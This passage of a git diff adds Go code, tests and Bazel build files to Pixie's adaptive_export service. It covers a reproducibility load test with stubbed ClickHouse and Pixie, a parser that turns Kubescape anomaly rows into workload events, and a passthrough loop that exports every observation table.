+	snapshot := make([]string, 0, len(s.insertedSQL))
+	snapshot = append(snapshot, s.insertedSQL...)
+	return snapshot
+}
+
+// fixedClock is a clock whose Now() always returns t, so the window math sees the same "now" every rep.
+type fixedClock struct{ t time.Time }

+func (f fixedClock) Now() time.Time { return f.t }
+
+// cannedQuerier is the mock Pixie data plane. For the table named in the PxL
+// (px.DataFrame(table='<name>')) it synthesizes perTable[<name>] fixed rows;
+// a table missing from perTable yields 0 rows — exactly how a silent pod
+// looks to real Pixie.
+type cannedQuerier struct {
+ perTable map[string]int // table -> row count to synthesize
+}
+
+var tableInPxL = regexp.MustCompile(`table='([^']+)'`) // captures <name> from table='<name>'
+
+// Query synthesizes q.perTable[<table>] rows for the table named in pxl;
+// PxL without a table='...' clause is rejected with an error.
+func (q *cannedQuerier) Query(_ context.Context, pxl string) ([]map[string]any, error) {
+	match := tableInPxL.FindStringSubmatch(pxl)
+	if match == nil {
+		return nil, fmt.Errorf("cannedQuerier: no table in pxl: %s", pxl)
+	}
+	rows := make([]map[string]any, q.perTable[match[1]])
+	for i := range rows {
+		// Fully specified row; encoding/json sorts map keys, so the bytes repeat exactly.
+		rows[i] = map[string]any{
+			"time_":     1744477360303026359 + int64(i),
+			"namespace": "aeload",
+			"pod":       "aeload/gen-l1",
+			"req_path":  fmt.Sprintf("/ping/%d", i),
+			"table":     match[1],
+		}
+	}
+	return rows, nil
+}
+
+// counts holds the per-rep measurement of what reached "ClickHouse", as computed by measure.
+type counts struct {
+ rowsByTable map[string]int // non-blank body lines per protocol table
+ bytesByTable map[string]int // summed INSERT body length per protocol table
+ attribution int // non-blank body lines inserted into adaptive_attribution
+}
+
+// measure parses the stub-CH insert bodies into per-table row/byte counts.
+func measure(sqls []string, bodies [][]byte) counts {
+ c := counts{rowsByTable: map[string]int{}, bytesByTable: map[string]int{}}
+ insertRe := regexp.MustCompile(`INSERT INTO forensic_db\.(\w+) FORMAT JSONEachRow`)
+ for i, q := range sqls {
+ m := insertRe.FindStringSubmatch(q)
+ if m == nil {
+ continue
+ }
+ table := m[1]
+ body := bodies[i]
+ nrows := 0
+ for _, line := range strings.Split(strings.TrimRight(string(body), "\n"), "\n") {
+ if strings.TrimSpace(line) != "" {
+ nrows++
+ }
+ }
+ if table == "adaptive_attribution" {
+ c.attribution += nrows
+ continue
+ }
+ c.rowsByTable[table] += nrows
+ c.bytesByTable[table] += len(body)
+ }
+ return c
+}
+
+// runOnce runs one complete Trigger→Controller→Sink pass: a fresh stub-CH
+// serves a single kubescape row, the canned querier stands in for Pixie, and
+// the AE write surface recorded by the stub is returned as counts.
+func runOnce(t *testing.T, perTable map[string]int) counts {
+	t.Helper()
+	stub := &stubClickHouse{kubescape: []map[string]any{canonicalKubescapeRow()}}
+	srv := newStubServer(stub)
+	defer srv.Close()
+
+	trg, err := trigger.New(trigger.Config{
+		Endpoint:     srv.URL,
+		Hostname:     "node-1",
+		PollInterval: 10 * time.Millisecond,
+	})
+	if err != nil {
+		t.Fatalf("trigger.New: %v", err)
+	}
+	snk, err := sink.New(sink.Config{Endpoint: srv.URL})
+	if err != nil {
+		t.Fatalf("sink.New: %v", err)
+	}
+
+	// One pass over perTable: collect the tables to push and count those
+	// with a non-zero canned row count (one protocol insert expected each).
+	tables, wantTables := make([]string, 0, len(perTable)), 0
+	for name, rows := range perTable {
+		tables = append(tables, name)
+		if rows > 0 {
+			wantTables++
+		}
+	}
+	clk := fixedClock{t: time.Unix(1744477370, 0)} // > event_time, so window is open
+	ctl := controller.New(trg, snk, controller.Config{
+		Hostname:            "node-1",
+		Before:              time.Minute,
+		After:               time.Minute,
+		PushPixieTables:     tables,
+		PushRefreshInterval: -1, // single-shot: exactly one pull, no MergeTree dup inflation
+	}, clk).WithPixieQuerier(&cannedQuerier{perTable: perTable})
+
+	ctx, cancel := context.WithCancel(context.Background())
+	stopped := make(chan struct{})
+	go func() { _ = ctl.Run(ctx); close(stopped) }()
+
+	// Poll until the attribution row AND an insert for every expected
+	// protocol table have landed, or until the 3s deadline passes; a
+	// timeout is not reported here, the caller's assertions catch it.
+	deadline := time.Now().Add(3 * time.Second)
+	landed := func() bool {
+		seen := measure(stub.sqls(), stub.bodies())
+		return seen.attribution >= 1 && len(seen.rowsByTable) >= wantTables
+	}
+	for time.Now().Before(deadline) && !landed() {
+		time.Sleep(5 * time.Millisecond)
+	}
+
+	// Stop the controller before taking the final measurement.
+	cancel()
+	select {
+	case <-stopped:
+	case <-time.After(2 * time.Second):
+		t.Fatalf("controller did not stop within 2s")
+	}
+	return measure(stub.sqls(), stub.bodies())
+}
+
+// TestLoad_DataPlaneExactReproducible_L1 — the hermetic reproducibility proof.
+func TestLoad_DataPlaneExactReproducible_L1(t *testing.T) {
+	const reps = 100
+	perTable := map[string]int{
+		"http_events":  100,
+		"dns_events":   100,
+		"pgsql_events": 100,
+	}
+
+	var baseline counts // measurement of rep 0; every later rep must equal it
+	for rep := 0; rep < reps; rep++ {
+		got := runOnce(t, perTable)
+
+		// Per-rep exactness: each table holds exactly its canned row count,
+		// with one attribution row and no table beyond those in perTable.
+		for tbl, want := range perTable {
+			if have := got.rowsByTable[tbl]; have != want {
+				t.Fatalf("rep %d: %s rows = %d, want %d", rep, tbl, have, want)
+			}
+		}
+		if got.attribution != 1 {
+			t.Fatalf("rep %d: adaptive_attribution rows = %d, want 1", rep, got.attribution)
+		}
+		if len(got.rowsByTable) != len(perTable) {
+			t.Fatalf("rep %d: unexpected tables written: %v", rep, keysOf(got.rowsByTable))
+		}
+
+		if rep == 0 {
+			baseline = got
+			continue
+		}
+		// Cross-rep exactness: identical rows AND bytes => std = 0 => CV = 0.
+		for tbl := range perTable {
+			if now, ref := got.rowsByTable[tbl], baseline.rowsByTable[tbl]; now != ref {
+				t.Fatalf("rep %d: %s row count drifted: %d != %d (rep 0)", rep, tbl, now, ref)
+			}
+			if now, ref := got.bytesByTable[tbl], baseline.bytesByTable[tbl]; now != ref {
+				t.Fatalf("rep %d: %s byte total drifted: %d != %d (rep 0)", rep, tbl, now, ref)
+			}
+		}
+	}
+	t.Logf("L1 reproducible across %d reps: http=%d(%dB) dns=%d(%dB) pgsql=%d(%dB) attribution=%d",
+		reps,
+		baseline.rowsByTable["http_events"], baseline.bytesByTable["http_events"],
+		baseline.rowsByTable["dns_events"], baseline.bytesByTable["dns_events"],
+		baseline.rowsByTable["pgsql_events"], baseline.bytesByTable["pgsql_events"],
+		baseline.attribution)
+}
+
+func keysOf(m map[string]int) []string {
+	names := make([]string, 0, len(m))
+	for name := range m { // map iteration order: the result is unsorted
+		names = append(names, name)
+	}
+	return names
+}
diff --git a/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel b/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel
new file mode 100644
index 00000000000..47b9b0b3481
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel
@@ -0,0 +1,37 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "kubescape",
+ srcs = ["extract.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ ],
+)
+
+pl_go_test(
+ name = "kubescape_test",
+ srcs = ["extract_test.go"],
+ embed = [":kubescape"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ ],
+)
diff --git a/src/vizier/services/adaptive_export/internal/kubescape/extract.go b/src/vizier/services/adaptive_export/internal/kubescape/extract.go
new file mode 100644
index 00000000000..be51d5159c0
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/kubescape/extract.go
@@ -0,0 +1,117 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package kubescape parses the Kubescape-shaped fields of a
+// forensic_db.kubescape_logs row into the source-agnostic types used
+// downstream:
+// - anomaly.Target — workload identity (used to compute the hash)
+// - Event — Target plus event-specific fields (event_time,
+// rule id, hostname) needed for window math + persistence
+//
+// This package is the only place in the operator that knows the JSON
+// shape of RuntimeK8sDetails / RuntimeProcessDetails. Once an Event
+// has been extracted, no further code needs to care that the source
+// was Kubescape.
+package kubescape
+
+import (
+ "encoding/json"
+ "errors"
+ "fmt"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+// ErrIncompleteEvent is the sentinel wrapped by every Extract failure: a
+// required field (event_time, rule id, comm, pid) is missing or zero, or
+// one of the JSON detail columns does not parse. Pod and Namespace are
+// NOT required — host-pid processes legitimately run without them.
+var ErrIncompleteEvent = errors.New("kubescape: incomplete event")
+
+// Row is the operator-facing shape of one forensic_db.kubescape_logs row
+// and the input to Extract. The JSON columns stay raw strings here; Extract
+// decodes them itself, which keeps the ClickHouse driver layer simple.
+type Row struct {
+ EventTime uint64 // schema: event_time UInt64 (unix nanos); zero is rejected by Extract
+ RuleID string // empty is rejected by Extract
+ Hostname string // copied into Event.Hostname as-is
+ K8sDetails string // schema: RuntimeK8sDetails String (JSON); may be empty
+ ProcessDetails string // schema: RuntimeProcessDetails String (JSON); must parse
+}
+
+// Event is one parsed kubescape anomaly, as returned by Extract: workload
+// identity plus the bits needed for time-window math and ClickHouse persistence.
+type Event struct {
+ Target anomaly.Target // PID, Comm, Pod, Namespace; Pod/Namespace may be empty
+ EventTime uint64 // unix nanoseconds — propagated end-to-end
+ RuleID string // diagnostic only
+ Hostname string // node-local key
+}
+
+// k8sDetails declares only the pod / namespace keys of RuntimeK8sDetails;
+// undeclared keys are ignored on decode, so upstream additions don't break us.
+type k8sDetails struct {
+ PodName string `json:"podName"`
+ PodNamespace string `json:"podNamespace"`
+}
+
+type processDetails struct { // the part of RuntimeProcessDetails that Extract reads
+ ProcessTree struct {
+ PID uint64 `json:"pid"` // zero (or absent) is rejected by Extract
+ Comm string `json:"comm"` // empty (or absent) is rejected by Extract
+ } `json:"processTree"`
+}
+
+// Extract turns a Row into an Event. EventTime, RuleID, processTree.pid
+// and processTree.comm are mandatory; Pod and Namespace MAY be empty
+// (host-pid processes outside any pod). Pure: no I/O, no clock.
+func Extract(r Row) (Event, error) {
+	switch {
+	case r.RuleID == "":
+		return Event{}, fmt.Errorf("%w: RuleID empty", ErrIncompleteEvent)
+	case r.EventTime == 0:
+		return Event{}, fmt.Errorf("%w: EventTime zero", ErrIncompleteEvent)
+	}
+
+	// An empty RuntimeK8sDetails is fine (host-pid events carry no
+	// pod/namespace); only JSON that fails to parse is an error.
+	var pod k8sDetails
+	if raw := r.K8sDetails; raw != "" {
+		if err := json.Unmarshal([]byte(raw), &pod); err != nil {
+			return Event{}, fmt.Errorf("%w: parse RuntimeK8sDetails: %v", ErrIncompleteEvent, err)
+		}
+	}
+
+	var details processDetails
+	if err := json.Unmarshal([]byte(r.ProcessDetails), &details); err != nil {
+		return Event{}, fmt.Errorf("%w: parse RuntimeProcessDetails: %v", ErrIncompleteEvent, err)
+	}
+	proc := details.ProcessTree
+	switch {
+	case proc.Comm == "":
+		return Event{}, fmt.Errorf("%w: processTree.comm empty", ErrIncompleteEvent)
+	case proc.PID == 0:
+		return Event{}, fmt.Errorf("%w: processTree.pid zero", ErrIncompleteEvent)
+	}
+
+	target := anomaly.Target{
+		PID:       proc.PID,
+		Comm:      proc.Comm,
+		Pod:       pod.PodName,
+		Namespace: pod.PodNamespace,
+	}
+	return Event{Target: target, EventTime: r.EventTime, RuleID: r.RuleID, Hostname: r.Hostname}, nil
+}
diff --git a/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go b/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go
new file mode 100644
index 00000000000..90f10500d29
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go
@@ -0,0 +1,141 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package kubescape
+
+import (
+ "errors"
+ "testing"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+const canonicalK8sDetails = `{"clusterName":"bobexample","containerName":"redis","namespace":"redis","podName":"redis-578d5dc9bd-kjj78","podNamespace":"redis","workloadName":"redis","workloadKind":"Deployment"}` // superset of the keys Extract reads (podName, podNamespace)
+
+const canonicalProcessDetails = `{"processTree":{"pid":106040,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":105965,"uid":999}}` // superset of the keys Extract reads (pid, comm)
+
+func canonicalRow() Row { // a fresh, fully populated Row; tests mutate single fields of their copy
+ return Row{
+ EventTime: 1744477360303026359,
+ RuleID: "R1005",
+ Hostname: "node-1",
+ K8sDetails: canonicalK8sDetails,
+ ProcessDetails: canonicalProcessDetails,
+ }
+}
+
+// TestExtract_FromCanonicalRow — a real-shape kubescape row yields all
+// four target fields plus EventTime, RuleID and Hostname.
+func TestExtract_FromCanonicalRow(t *testing.T) {
+	ev, err := Extract(canonicalRow())
+	if err != nil {
+		t.Fatalf("Extract: %v", err)
+	}
+
+	// Cases are tried in order, so the first mismatching field is the
+	// one that gets reported.
+	target := ev.Target
+	switch {
+	case target.PID != 106040:
+		t.Fatalf("PID = %d", target.PID)
+	case target.Comm != "redis-server":
+		t.Fatalf("Comm = %q", target.Comm)
+	case target.Pod != "redis-578d5dc9bd-kjj78":
+		t.Fatalf("Pod = %q", target.Pod)
+	case target.Namespace != "redis":
+		t.Fatalf("Namespace = %q", target.Namespace)
+	case ev.EventTime != 1744477360303026359:
+		t.Fatalf("EventTime = %d", ev.EventTime)
+	case ev.RuleID != "R1005" || ev.Hostname != "node-1":
+		t.Fatalf("RuleID/Hostname wrong: %+v", ev)
+	}
+}
+
+// TestExtract_AllowsEmptyPodNamespace — a row without k8s details
+// (host-pid process, no pod) must still extract into a valid Event.
+func TestExtract_AllowsEmptyPodNamespace(t *testing.T) {
+	hostPID := canonicalRow()
+	hostPID.K8sDetails = "" // host-pid: no k8s context
+	ev, err := Extract(hostPID)
+	if err != nil {
+		t.Fatalf("Extract empty-k8s row: %v", err)
+	}
+	got := ev.Target
+	if !(got.Pod == "" && got.Namespace == "") {
+		t.Fatalf("expected empty Pod/Namespace, got %+v", got)
+	}
+	if !(got.PID == 106040 && got.Comm == "redis-server") {
+		t.Fatalf("PID/Comm lost: %+v", got)
+	}
+	if h := anomaly.Hash(got); len(h) != 32 { // the hash must still come out at its usual length
+		t.Fatalf("hash on empty-k8s target invalid: %q", h)
+	}
+}
+
+// TestExtract_StableUnderJSONReorder — shuffling the JSON keys (and varying
+// keys Extract never reads) leaves Target and its hash unchanged.
+func TestExtract_StableUnderJSONReorder(t *testing.T) {
+	shuffled := canonicalRow()
+	shuffled.K8sDetails = `{"workloadKind":"Deployment","podNamespace":"redis","podName":"redis-578d5dc9bd-kjj78","clusterName":"bobexample"}`
+	shuffled.ProcessDetails = `{"processTree":{"comm":"redis-server","ppid":1,"pid":106040,"cmdline":"redis-server","uid":0}}`
+	a, errA := Extract(canonicalRow())
+	b, errB := Extract(shuffled)
+	if !(errA == nil && errB == nil) {
+		t.Fatalf("Extract errors: a=%v b=%v", errA, errB)
+	}
+	if a.Target != b.Target {
+		t.Fatalf("Target differs under JSON reorder: %+v vs %+v", a.Target, b.Target)
+	}
+	if hashA, hashB := anomaly.Hash(a.Target), anomaly.Hash(b.Target); hashA != hashB {
+		t.Fatalf("Hash differs under JSON reorder")
+	}
+}
+
+// TestExtract_RequiresProcessTreeComm — unparseable details and a missing or empty comm are rejected.
+func TestExtract_RequiresProcessTreeComm(t *testing.T) {
+	bad := []string{"", `{"processTree":}`, `{}`, `{"processTree":{"pid":1}}`, `{"processTree":{"comm":"","pid":1}}`}
+	for _, proc := range bad {
+		row := canonicalRow()
+		row.ProcessDetails = proc
+		if _, err := Extract(row); !errors.Is(err, ErrIncompleteEvent) {
+			t.Fatalf("proc=%q → %v, want ErrIncompleteEvent", proc, err)
+		}
+	}
+}
+
+// TestExtract_RequiresProcessTreePID — a zero pid is rejected; the pid
+// is required for hash uniqueness.
+func TestExtract_RequiresProcessTreePID(t *testing.T) {
+	zeroPID := canonicalRow()
+	zeroPID.ProcessDetails = `{"processTree":{"comm":"redis-server","pid":0}}`
+	if _, err := Extract(zeroPID); !errors.Is(err, ErrIncompleteEvent) {
+		t.Fatalf("got %v, want ErrIncompleteEvent for pid=0", err)
+	}
+}
+
+// TestExtract_RequiresEventTimeAndRuleID — each one is required on its own.
+func TestExtract_RequiresEventTimeAndRuleID(t *testing.T) {
+	noTime := canonicalRow()
+	noTime.EventTime = 0
+	if _, err := Extract(noTime); !errors.Is(err, ErrIncompleteEvent) {
+		t.Fatalf("EventTime=0 not rejected: %v", err)
+	}
+	noRule := canonicalRow()
+	noRule.RuleID = ""
+	if _, err := Extract(noRule); !errors.Is(err, ErrIncompleteEvent) {
+		t.Fatalf("RuleID='' not rejected: %v", err)
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/passthrough/BUILD.bazel b/src/vizier/services/adaptive_export/internal/passthrough/BUILD.bazel
new file mode 100644
index 00000000000..b1cb579e5be
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/passthrough/BUILD.bazel
@@ -0,0 +1,47 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+# Library target for the passthrough (firehose) loop. Visibility is limited
+# to packages under //src/vizier/services/adaptive_export.
+go_library(
+ name = "passthrough",
+ srcs = ["passthrough.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/passthrough",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/anomaly",
+ "//src/vizier/services/adaptive_export/internal/clickhouse",
+ "//src/vizier/services/adaptive_export/internal/pxl",
+ "//src/vizier/services/adaptive_export/internal/reconcile",
+ "@com_github_sirupsen_logrus//:logrus",
+ ],
+)
+
+# Unit tests for the passthrough package. The library is embedded so the
+# tests compile in the same package; deps lists only the extra packages the
+# test sources import directly.
+pl_go_test(
+ name = "passthrough_test",
+ srcs = [
+ "compiled_test.go",
+ "passthrough_test.go",
+ "reconcile_test.go",
+ ],
+ embed = [":passthrough"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/clickhouse",
+ "//src/vizier/services/adaptive_export/internal/reconcile",
+ "//src/vizier/services/adaptive_export/internal/sink",
+ ],
+)
diff --git a/src/vizier/services/adaptive_export/internal/passthrough/compiled_test.go b/src/vizier/services/adaptive_export/internal/passthrough/compiled_test.go
new file mode 100644
index 00000000000..25f08022154
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/passthrough/compiled_test.go
@@ -0,0 +1,136 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package passthrough
+
+import (
+ "context"
+ "sort"
+ "sync"
+ "testing"
+ "time"
+)
+
+// syncSink is a test sink that accumulates the number of rows written per
+// table. All access to got goes through mu, so it can be used from the
+// concurrent compiled tick and inspected afterwards.
+type syncSink struct {
+	mu  sync.Mutex
+	got map[string]int
+}
+
+// newSyncSink returns a syncSink with an empty, ready-to-use counter map.
+func newSyncSink() *syncSink {
+	return &syncSink{got: make(map[string]int)}
+}
+
+// WritePixieRows adds len(rows) to the running total for table. It never
+// fails.
+func (s *syncSink) WritePixieRows(_ context.Context, table string, rows []map[string]any) error {
+	written := len(rows)
+	s.mu.Lock()
+	s.got[table] += written
+	s.mu.Unlock()
+	return nil
+}
+
+// tables returns the names of all tables written so far, sorted
+// lexicographically.
+func (s *syncSink) tables() []string {
+	s.mu.Lock()
+	names := make([]string, 0, len(s.got))
+	for name := range s.got {
+		names = append(names, name)
+	}
+	s.mu.Unlock()
+	sort.Strings(names)
+	return names
+}
+
+// TestNew_ExcludesHTTP2 proves http2_messages.beta is dropped from the
+// firehose set (it isn't materialised on every cluster → "Table not found"
+// spam) while another dotted-but-real table (kafka_events.beta) is kept.
+func TestNew_ExcludesHTTP2(t *testing.T) {
+ // Tables nil → defaults to clickhouse.PixieTables() which DOES list
+ // http2_messages.beta; New must strip it.
+ loop := New(tableQuerier{n: map[string]int{}}, newSyncSink(),
+ Config{Window: time.Minute, Compiled: true})
+
+ for _, tbl := range loop.cfg.Tables {
+ if tbl == "http2_messages.beta" {
+ t.Fatalf("http2_messages.beta must be excluded from passthrough tables: %v", loop.cfg.Tables)
+ }
+ }
+ if _, ok := loop.tmpl["http2_messages.beta"]; ok {
+ t.Fatalf("http2_messages.beta must not be precompiled")
+ }
+ // Sanity: a real table is still present + precompiled.
+ if _, ok := loop.tmpl["http_events"]; !ok {
+ t.Fatalf("http_events should be precompiled; tmpl=%v", loop.tmpl)
+ }
+}
+
+// TestCompiledTick_WritesAllTables drives one tick through the concurrent
+// precompiled path and checks that each table with rows ends up in the sink
+// with exactly the row count the querier produced. (Under `go test -race`
+// this also exercises the fan-out for data races.)
+func TestCompiledTick_WritesAllTables(t *testing.T) {
+	want := map[string]int{"http_events": 4, "dns_events": 2, "conn_stats": 7}
+
+	sink := newSyncSink()
+	querier := tableQuerier{n: map[string]int{
+		"http_events": 4,
+		"dns_events":  2,
+		"conn_stats":  7,
+	}}
+	cfg := Config{
+		Window:   time.Minute,
+		Tables:   []string{"http_events", "dns_events", "conn_stats"},
+		Compiled: true,
+	}
+	New(querier, sink, cfg).tick(context.Background())
+
+	sink.mu.Lock()
+	defer sink.mu.Unlock()
+	if len(want) != len(sink.got) {
+		t.Fatalf("wrote %v tables, want %v", sink.got, want)
+	}
+	for name, expected := range want {
+		if actual := sink.got[name]; actual != expected {
+			t.Errorf("table %s wrote %d rows, want %d", name, actual, expected)
+		}
+	}
+}
+
+// TestCompiledTick_EqualsLegacy proves the compiled path and the legacy
+// serial path write the SAME tables with the SAME row counts for identical
+// inputs — the toggle changes performance/structure, not output.
+//
+// The table sets are compared name-by-name (tables() returns them sorted)
+// and against the expected count, so a path that writes a different or an
+// additional table is caught rather than hidden behind an equal length.
+func TestCompiledTick_EqualsLegacy(t *testing.T) {
+	rows := map[string]int{"http_events": 3, "dns_events": 5, "conn_stats": 1}
+	tables := []string{"http_events", "dns_events", "conn_stats"}
+
+	// run executes a single tick on a fresh loop+sink and returns the sink.
+	run := func(compiled bool) *syncSink {
+		sink := newSyncSink()
+		New(tableQuerier{n: rows}, sink,
+			Config{Window: time.Minute, Tables: tables, Compiled: compiled}).
+			tick(context.Background())
+		return sink
+	}
+
+	c := run(true)
+	l := run(false)
+
+	cs, ls := c.tables(), l.tables()
+	if len(cs) != len(ls) || len(cs) != len(rows) {
+		t.Fatalf("compiled wrote %v, legacy wrote %v", cs, ls)
+	}
+	for i := range cs {
+		if cs[i] != ls[i] {
+			t.Fatalf("compiled wrote %v, legacy wrote %v", cs, ls)
+		}
+	}
+	// tick has returned for both loops, so reading got here does not race
+	// with any writer.
+	for tbl, n := range rows {
+		if c.got[tbl] != n || l.got[tbl] != n {
+			t.Errorf("table %s: compiled=%d legacy=%d want %d", tbl, c.got[tbl], l.got[tbl], n)
+		}
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/passthrough/passthrough.go b/src/vizier/services/adaptive_export/internal/passthrough/passthrough.go
new file mode 100644
index 00000000000..2e551a1907b
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/passthrough/passthrough.go
@@ -0,0 +1,284 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package passthrough is the firehose-mode counterpart to the anomaly-gated
+// adaptive write path. When enabled, a single background loop queries every
+// pixie observation table with an empty Target (no ns/pod predicate),
+// covering the configured rolling window, and writes the result via the
+// existing sink. The intent is one-shot A/B measurement: compare the
+// row-count + on-disk byte volume of forensic_db tables under ADAPTIVE_PASSTHROUGH=1
+// (Phase EVERYTHING) vs ADAPTIVE_PASSTHROUGH=0 (Phase AE-FILTER) under the
+// same load + window, yielding the AE capture fraction per table.
+//
+// This package is intentionally minimal: no anomaly gate, no ActiveSet, no
+// trigger. It reuses the same QueryFor / Adapter / Sink wiring as the rest
+// of AE so the bytes-per-row shape is comparable across phases.
+package passthrough
+
+import (
+ "context"
+ "sync"
+ "time"
+
+ log "github.com/sirupsen/logrus"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl"
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile"
+)
+
+// excludedTables are dropped from the firehose table set: tables that are
+// declared builtin but are not materialised on every cluster, so a
+// passthrough pull against them returns a "Table not found" compilation
+// error every tick (pure log spam, zero rows). http2_messages.beta is the
+// known offender. Removing it here keeps the schema/DDL lists (which still
+// own the table when it DOES exist) untouched.
+//
+// Keys are table names compared verbatim against the entries of
+// Config.Tables; filterExcluded consults this set.
+var excludedTables = map[string]bool{
+ "http2_messages.beta": true,
+}
+
+// querier matches the cmd-side pixieAdapter wrapper (returns
+// []map[string]any instead of pixieapi.Row) so the loop is decoupled
+// from pxapi internals + trivially fakeable in tests.
+//
+// Query executes the PxL source src and returns one map per result row, or
+// an error if the query failed.
+type querier interface {
+ Query(ctx context.Context, src string) ([]map[string]any, error)
+}
+
+// sink writes rows for a specific pixie table to forensic_db.<table>.
+//
+// WritePixieRows persists rows for the named table and returns a non-nil
+// error if the write did not succeed.
+type sink interface {
+ WritePixieRows(ctx context.Context, table string, rows []map[string]any) error
+}
+
+// Config carries the env-derived knobs. Window: the rolling lookback the
+// loop's PxL covers each refresh. Refresh: cadence between loop iterations.
+// Tables: which pixie tables to firehose (defaults to clickhouse.PixieTables()
+// when nil/empty).
+//
+// New replaces non-positive Window/Refresh values with 30s and always
+// removes excludedTables entries from Tables.
+type Config struct {
+ Window time.Duration
+ Refresh time.Duration
+ Tables []string
+ // Rec records per-pull read/wrote counts (ADAPTIVE_RECONCILE). nil →
+ // defaulted to reconcile.Nop{} in New (instrument off).
+ Rec reconcile.Recorder
+ // Hostname is the node name stamped on reconcile rows.
+ Hostname string
+ // Compiled selects the firehose query path. When true (the default
+ // wired by cmd/main.go), per-table PxL is precompiled ONCE at New and
+ // all tables are pulled CONCURRENTLY per tick. When false, the legacy
+ // path is used: QueryFor rebuilds each table's PxL every tick and the
+ // tables are walked serially. The env var ADAPTIVE_PASSTHROUGH_COMPILED
+ // (cmd/main.go) flips this — set it to "false" to revert.
+ // Note that the Go zero value is false, i.e. the legacy path.
+ Compiled bool
+}
+
+// Loop is the passthrough goroutine. Build it with New (which applies the
+// Config defaults) and drive it with Run.
+type Loop struct {
+ // q executes the per-table PxL; s persists the rows it returns.
+ q querier
+ s sink
+ // cfg is the Config after New has applied defaults and exclusions.
+ cfg Config
+ // tmpl holds the precompiled per-table PxL templates (table → fmt
+ // template with two %d time-bound verbs). Populated in New only when
+ // cfg.Compiled; nil otherwise.
